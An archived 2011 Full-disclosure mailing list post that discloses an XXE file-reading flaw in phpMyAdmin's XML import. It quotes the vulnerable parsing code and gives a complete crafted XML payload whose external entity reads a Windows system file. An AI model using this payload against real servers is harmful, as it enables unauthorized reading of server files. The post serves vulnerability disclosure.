[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] PhpMyAdmin Arbitrary File Reading
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] PhpMyAdmin Arbitrary File Reading
- From: WooYun <root@xxxxxxxxxx>
- Date: Wed, 2 Nov 2011 15:30:56 +0800
Hi
80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string
function to read xml from user input,this may be exploied to read files
from the server or network
in libraries/import/xml.php,some code like this
/**
* Load the XML string
*
* The option LIBXML_COMPACT is specified because it can
* result in increased performance without the need to
* alter the code in any way. It's basically a freebee.
*/
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);
unset($buffer);
/**
* The XML was malformed
*/
if ($xml === FALSE) {
so you just need to make a xml like this
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wooyun [
<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">
]>
<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/";>
<!--
- Structure schemas
-->
<pma:structure_schemas>
<pma:database name="test" collation="utf8_general_ci"
charset="utf8">
<pma:table name="ts_ad">
&hi80sec;
</pma:table>
</pma:database>
</pma:structure_schemas>
<!--
- 数据库: 'thinksns'
-->
<database name="thinksns">
<!-- 表 ts_ad -->
</database>
</pma_xml_export>
then import this xml in PhpMyAdmin,you will get the content you want.
From:http://www.wooyun.org/bugs/wooyun-2010-03185
:)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/